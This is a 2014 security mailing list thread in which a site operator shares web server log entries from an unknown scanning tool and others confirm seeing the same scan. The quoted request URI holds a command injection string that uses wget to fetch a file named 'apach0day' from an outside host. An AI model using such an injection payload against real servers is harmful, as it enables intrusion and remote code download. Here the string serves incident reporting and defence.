PaulDotCom mailing list archives

Re: [Security Weekly] apache chroot 0day?

From: Robin Wood <robin@digi.ninja>
Date: Mon, 28 Jul 2014 15:54:45 +0100

On 28 July 2014 15:30, Frank Michael <frankcmichael () gmail com> wrote:

Various sources confirming the same thing for other sites. All on 7/28.
Keep an eye open.

I've just mailed the SANS ISC about it saying that others had seen it, see
if they come back with anything.

Robin

On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:

I've got a site that was scanned this morning by a tool that left these
entries in the logs:

    [HTTP_USER_AGENT] => chroot-apach0day
    [HTTP_REFERRER] => /xA/x0a/x05
    [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%
20proxypipe.com/apach0day;

Anyone recognise it? That user agent isn't coming up in google searches.

Robin

_______________________________________________

Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com


_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Current thread:

[Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Sander Demeester (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Frank Michael (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? Chris Campbell (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
  - Re: [Security Weekly] apache chroot 0day? Xavier Mertens (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
  - Re: [Security Weekly] apache chroot 0day? xgermx (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
    - Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 28)

(Thread continues...)